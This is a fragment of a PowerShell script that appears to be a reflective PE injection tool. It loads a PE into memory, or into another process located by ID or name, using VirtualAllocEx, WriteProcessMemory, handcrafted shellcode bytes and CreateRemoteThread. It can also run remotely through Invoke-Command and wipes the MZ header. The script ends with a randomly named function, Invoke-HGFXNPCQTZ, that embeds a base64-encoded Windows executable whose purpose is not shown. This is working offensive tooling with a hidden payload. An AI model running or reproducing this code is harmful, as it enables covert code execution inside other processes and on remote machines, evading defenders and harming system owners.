2199.             $NXCompatible = $false
2200.         }
2201.  
2202.  
2203.  
2204.         $Process64Bit = $true
2205.         if ($RemoteLoading -eq $true)
2206.         {
2207.             $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
2208.             $Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "IsWow64Process")
2209.             if ($Result -eq [IntPtr]::Zero)
2210.             {
2211.                 Throw "Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit"
2212.             }
2213.  
2214.             [Bool]$Wow64Process = $false
2215.             $Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process)
2216.             if ($Success -eq $false)
2217.             {
2218.                 Throw "Call to IsWow64Process failed"
2219.             }
2220.  
2221.             if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))
2222.             {
2223.                 $Process64Bit = $false
2224.             }
2225.  
2226.  
2227.             $PowerShell64Bit = $true
2228.             if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
2229.             {
2230.                 $PowerShell64Bit = $false
2231.             }
2232.             if ($PowerShell64Bit -ne $Process64Bit)
2233.             {
2234.                 throw "PowerShell must be same architecture (x86/x64) as PE being loaded and remote process"
2235.             }
2236.         }
2237.         else
2238.         {
2239.             if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
2240.             {
2241.                 $Process64Bit = $false
2242.             }
2243.         }
2244.         if ($Process64Bit -ne $PEInfo.PE64Bit)
2245.         {
2246.             Throw "PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)"
2247.         }
2248.  
2249.  
2250.  
2251.         Write-Verbose "Allocating memory for the PE and write its headers to memory"
2252.  
2253.  
2254.         [IntPtr]$LoadAddr = [IntPtr]::Zero
2255.         $PESupportsASLR = ([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
2256.         if ((-not $ForceASLR) -and (-not $PESupportsASLR))
2257.         {
2258.             Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again OR try using the -ForceASLR flag (could cause crashes)" -WarningAction Continue
2259.             [IntPtr]$LoadAddr = $OriginalImageBase
2260.         }
2261.         elseif ($ForceASLR -and (-not $PESupportsASLR))
2262.         {
2263.             Write-Verbose "PE file doesn't support ASLR but -ForceASLR is set. Forcing ASLR on the PE file. This could result in a crash."
2264.         }
2265.  
2266.         if ($ForceASLR -and $RemoteLoading)
2267.         {
2268.             Write-Error "Cannot use ForceASLR when loading in to a remote process." -ErrorAction Stop
2269.         }
2270.         if ($RemoteLoading -and (-not $PESupportsASLR))
2271.         {
2272.             Write-Error "PE doesn't support ASLR. Cannot load a non-ASLR PE in to a remote process" -ErrorAction Stop
2273.         }
2274.  
2275.         $PEHandle = [IntPtr]::Zero
2276.         $EffectivePEHandle = [IntPtr]::Zero
2277.         if ($RemoteLoading -eq $true)
2278.         {
2279.  
2280.             $PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
2281.  
2282.  
2283.             $EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
2284.             if ($EffectivePEHandle -eq [IntPtr]::Zero)
2285.             {
2286.                 Throw "Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use"
2287.             }
2288.         }
2289.         else
2290.         {
2291.             if ($NXCompatible -eq $true)
2292.             {
2293.                 $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
2294.             }
2295.             else
2296.             {
2297.                 $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
2298.             }
2299.             $EffectivePEHandle = $PEHandle
2300.         }
2301.  
2302.         [IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage)
2303.         if ($PEHandle -eq [IntPtr]::Zero)
2304.         {
2305.             Throw "VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free)."
2306.         }
2307.         [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null
2308.  
2309.  
2310.  
2311.         Write-Verbose "Getting detailed PE information from the headers loaded in memory"
2312.         $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
2313.         $PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress
2314.         $PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle
2315.         Write-Verbose "StartAddress: $(Get-Hex $PEHandle)    EndAddress: $(Get-Hex $PEEndAddress)"
2316.  
2317.  
2318.  
2319.         Write-Verbose "Copy PE sections in to memory"
2320.         Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types
2321.  
2322.  
2323.  
2324.         Write-Verbose "Update memory addresses based on where the PE was actually loaded in memory"
2325.         Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types
2326.  
2327.  
2328.  
2329.         Write-Verbose "Import DLL's needed by the PE we are loading"
2330.         if ($RemoteLoading -eq $true)
2331.         {
2332.             Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle
2333.         }
2334.         else
2335.         {
2336.             Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
2337.         }
2338.  
2339.  
2340.  
2341.         if ($RemoteLoading -eq $false)
2342.         {
2343.             if ($NXCompatible -eq $true)
2344.             {
2345.                 Write-Verbose "Update memory protection flags"
2346.                 Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types
2347.             }
2348.             else
2349.             {
2350.                 Write-Verbose "PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute"
2351.             }
2352.         }
2353.         else
2354.         {
2355.             Write-Verbose "PE being loaded in to a remote process, not adjusting memory permissions"
2356.         }
2357.  
2358.  
2359.  
2360.         if ($RemoteLoading -eq $true)
2361.         {
2362.             [UInt32]$NumBytesWritten = 0
2363.             $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten)
2364.             if ($Success -eq $false)
2365.             {
2366.                 Throw "Unable to write shellcode to remote process memory."
2367.             }
2368.         }
2369.  
2370.  
2371.  
2372.         if ($PEInfo.FileType -ieq "DLL")
2373.         {
2374.             if ($RemoteLoading -eq $false)
2375.             {
2376.                 Write-Verbose "Calling dllmain so the DLL knows it has been loaded"
2377.                 $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
2378.                 $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
2379.                 $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
2380.  
2381.                 $DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null
2382.             }
2383.             else
2384.             {
2385.                 $DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
2386.  
2387.                 if ($PEInfo.PE64Bit -eq $true)
2388.                 {
2389.  
2390.                     $CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)
2391.                     $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)
2392.                     $CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
2393.                 }
2394.                 else
2395.                 {
2396.  
2397.                     $CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)
2398.                     $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)
2399.                     $CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)
2400.                 }
2401.                 $SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2)
2402.                 $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
2403.                 $SCPSMemOriginal = $SCPSMem
2404.  
2405.                 Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem
2406.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length)
2407.                 [System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false)
2408.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
2409.                 Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem
2410.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length)
2411.                 [System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false)
2412.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
2413.                 Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem
2414.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length)
2415.  
2416.                 $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
2417.                 if ($RSCAddr -eq [IntPtr]::Zero)
2418.                 {
2419.                     Throw "Unable to allocate memory in the remote process for shellcode"
2420.                 }
2421.  
2422.                 $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
2423.                 if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
2424.                 {
2425.                     Throw "Unable to write shellcode to remote process memory."
2426.                 }
2427.  
2428.                 $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
2429.                 $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
2430.                 if ($Result -ne 0)
2431.                 {
2432.                     Throw "Call to CreateRemoteThread to call GetProcAddress failed."
2433.                 }
2434.  
2435.                 $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
2436.             }
2437.         }
2438.         elseif ($PEInfo.FileType -ieq "EXE")
2439.         {
2440.  
2441.             [IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)
2442.             [System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00)
2443.             $OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr
2444.  
2445.  
2446.  
2447.             [IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
2448.             Write-Verbose "Call EXE Main function. Address: $(Get-Hex $ExeMainPtr). Creating thread for the EXE to run in."
2449.  
2450.             $Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null
2451.  
2452.             while($true)
2453.             {
2454.                 [Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0)
2455.                 if ($ThreadDone -eq 1)
2456.                 {
2457.                     Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants
2458.                     Write-Verbose "EXE thread has completed."
2459.                     break
2460.                 }
2461.                 else
2462.                 {
2463.                     Start-Sleep -Seconds 1
2464.                 }
2465.             }
2466.         }
2467.  
2468.         return @($PEInfo.PEHandle, $EffectivePEHandle)
2469.     }
2470.  
2471.  
2472.     Function Invoke-MemoryFreeLibrary
2473.     {
2474.         Param(
2475.         [Parameter(Position=0, Mandatory=$true)]
2476.         [IntPtr]
2477.         $PEHandle
2478.         )
2479.  
2480.  
2481.         $Win32Constants = Get-Win32Constants
2482.         $Win32Functions = Get-Win32Functions
2483.         $Win32Types = Get-Win32Types
2484.  
2485.         $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
2486.  
2487.  
2488.         if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
2489.         {
2490.             [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
2491.  
2492.             while ($true)
2493.             {
2494.                 $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
2495.  
2496.  
2497.                 if ($ImportDescriptor.Characteristics -eq 0 `
2498.                         -and $ImportDescriptor.FirstThunk -eq 0 `
2499.                         -and $ImportDescriptor.ForwarderChain -eq 0 `
2500.                         -and $ImportDescriptor.Name -eq 0 `
2501.                         -and $ImportDescriptor.TimeDateStamp -eq 0)
2502.                 {
2503.                     Write-Verbose "Done unloading the libraries needed by the PE"
2504.                     break
2505.                 }
2506.  
2507.                 $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)))
2508.                 $ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath)
2509.  
2510.                 if ($ImportDllHandle -eq $null)
2511.                 {
2512.                     Write-Warning "Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways" -WarningAction Continue
2513.                 }
2514.  
2515.                 $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)
2516.                 if ($Success -eq $false)
2517.                 {
2518.                     Write-Warning "Unable to free library: $ImportDllPath. Continuing anyways." -WarningAction Continue
2519.                 }
2520.  
2521.                 $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
2522.             }
2523.         }
2524.  
2525.  
2526.         Write-Verbose "Calling dllmain so the DLL knows it is being unloaded"
2527.         $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
2528.         $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
2529.         $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
2530.  
2531.         $DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null
2532.  
2533.  
2534.         $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
2535.         if ($Success -eq $false)
2536.         {
2537.             Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
2538.         }
2539.     }
2540.  
2541.  
2542.     Function Main
2543.     {
2544.         $Win32Functions = Get-Win32Functions
2545.         $Win32Types = Get-Win32Types
2546.         $Win32Constants =  Get-Win32Constants
2547.  
2548.         $RemoteProcHandle = [IntPtr]::Zero
2549.  
2550.  
2551.         if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne ""))
2552.         {
2553.             Throw "Can't supply a ProcId and ProcName, choose one or the other"
2554.         }
2555.         elseif ($ProcName -ne $null -and $ProcName -ne "")
2556.         {
2557.             $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)
2558.             if ($Processes.Count -eq 0)
2559.             {
2560.                 Throw "Can't find process $ProcName"
2561.             }
2562.             elseif ($Processes.Count -gt 1)
2563.             {
2564.                 $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId
2565.                 Write-Output $ProcInfo
2566.                 Throw "More than one instance of $ProcName found, please specify the process ID to inject in to."
2567.             }
2568.             else
2569.             {
2570.                 $ProcId = $Processes[0].ID
2571.             }
2572.         }
2573.  
2574.  
2575.  
2576.  
2577.  
2578.  
2579.  
2580.  
2581.  
2582.         if (($ProcId -ne $null) -and ($ProcId -ne 0))
2583.         {
2584.             $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)
2585.             if ($RemoteProcHandle -eq [IntPtr]::Zero)
2586.             {
2587.                 Throw "Couldn't obtain the handle for process ID: $ProcId"
2588.             }
2589.  
2590.             Write-Verbose "Got the handle for the remote process to inject in to"
2591.         }
2592.  
2593.  
2594.  
2595.         Write-Verbose "Calling Invoke-MemoryLoadLibrary"
2596.         $PEHandle = [IntPtr]::Zero
2597.         if ($RemoteProcHandle -eq [IntPtr]::Zero)
2598.         {
2599.             $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -ForceASLR $ForceASLR
2600.         }
2601.         else
2602.         {
2603.             $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle -ForceASLR $ForceASLR
2604.         }
2605.         if ($PELoadedInfo -eq [IntPtr]::Zero)
2606.         {
2607.             Throw "Unable to load PE, handle returned is NULL"
2608.         }
2609.  
2610.         $PEHandle = $PELoadedInfo[0]
2611.         $RemotePEHandle = $PELoadedInfo[1]
2612.  
2613.  
2614.  
2615.         $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
2616.         if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero))
2617.         {
2618.  
2619.  
2620.  
2621.             switch ($FuncReturnType)
2622.             {
2623.                 'WString' {
2624.                     Write-Verbose "Calling function with WString return type"
2625.                     [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "WStringFunc"
2626.                     if ($WStringFuncAddr -eq [IntPtr]::Zero)
2627.                     {
2628.                         Throw "Couldn't find function address."
2629.                     }
2630.                     $WStringFuncDelegate = Get-DelegateType @() ([IntPtr])
2631.                     $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)
2632.                     [IntPtr]$OutputPtr = $WStringFunc.Invoke()
2633.                     $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)
2634.                     Write-Output $Output
2635.                 }
2636.  
2637.                 'String' {
2638.                     Write-Verbose "Calling function with String return type"
2639.                     [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "StringFunc"
2640.                     if ($StringFuncAddr -eq [IntPtr]::Zero)
2641.                     {
2642.                         Throw "Couldn't find function address."
2643.                     }
2644.                     $StringFuncDelegate = Get-DelegateType @() ([IntPtr])
2645.                     $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate)
2646.                     [IntPtr]$OutputPtr = $StringFunc.Invoke()
2647.                     $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr)
2648.                     Write-Output $Output
2649.                 }
2650.  
2651.                 'Void' {
2652.                     Write-Verbose "Calling function with Void return type"
2653.                     [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
2654.                     if ($VoidFuncAddr -eq [IntPtr]::Zero)
2655.                     {
2656.  
2657.                     }
2658.                     else
2659.                     {
2660.                     $VoidFuncDelegate = Get-DelegateType @() ([Void])
2661.                     $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate)
2662.                     $VoidFunc.Invoke() | Out-Null
2663.                     }
2664.                 }
2665.             }
2666.  
2667.  
2668.  
2669.         }
2670.  
2671.         elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero))
2672.         {
2673.             $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
2674.             if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))
2675.             {
2676.  
2677.             }
2678.             else{
2679.             $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle
2680.             $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle
2681.  
2682.  
2683.             $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions
2684.             }
2685.         }
2686.  
2687.  
2688.  
2689.         if ($RemoteProcHandle -eq [IntPtr]::Zero -and $PEInfo.FileType -ieq "DLL")
2690.         {
2691.  
2692.         }
2693.         else
2694.         {
2695.  
2696.  
2697.  
2698.  
2699.  
2700.  
2701.         }
2702.  
2703.         Write-Verbose "Done!"
2704.     }
2705.  
2706.     Main
2707. }
2708.  
2709.  
2710. Function Main
2711. {
2712.     if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent)
2713.     {
2714.         $DebugPreference  = "Continue"
2715.     }
2716.  
2717.     Write-Verbose "PowerShell ProcessID: $PID"
2718.  
2719.  
2720.     $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join ''
2721.  
2722.     if ($e_magic -ne 'MZ')
2723.     {
2724.         throw 'PE is not a valid PE file.'
2725.     }
2726.  
2727.     if (-not $DoNotZeroMZ) {
2728.  
2729.  
2730.         $PEBytes[0] = 0
2731.         $PEBytes[1] = 0
2732.     }
2733.  
2734.  
2735.     if ($ExeArgs -ne $null -and $ExeArgs -ne '')
2736.     {
2737.         $ExeArgs = "ReflectiveExe $ExeArgs"
2738.     }
2739.     else
2740.     {
2741.         $ExeArgs = "ReflectiveExe"
2742.     }
2743.  
2744.     if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$")
2745.     {
2746.         Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR)
2747.     }
2748.     else
2749.     {
2750.         Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName
2751.     }
2752. }
2753.  
2754. Main
2755. }
2756.  
2757. function Invoke-HGFXNPCQTZ
2758. {
2759.  
2760. $PEBytes32 = "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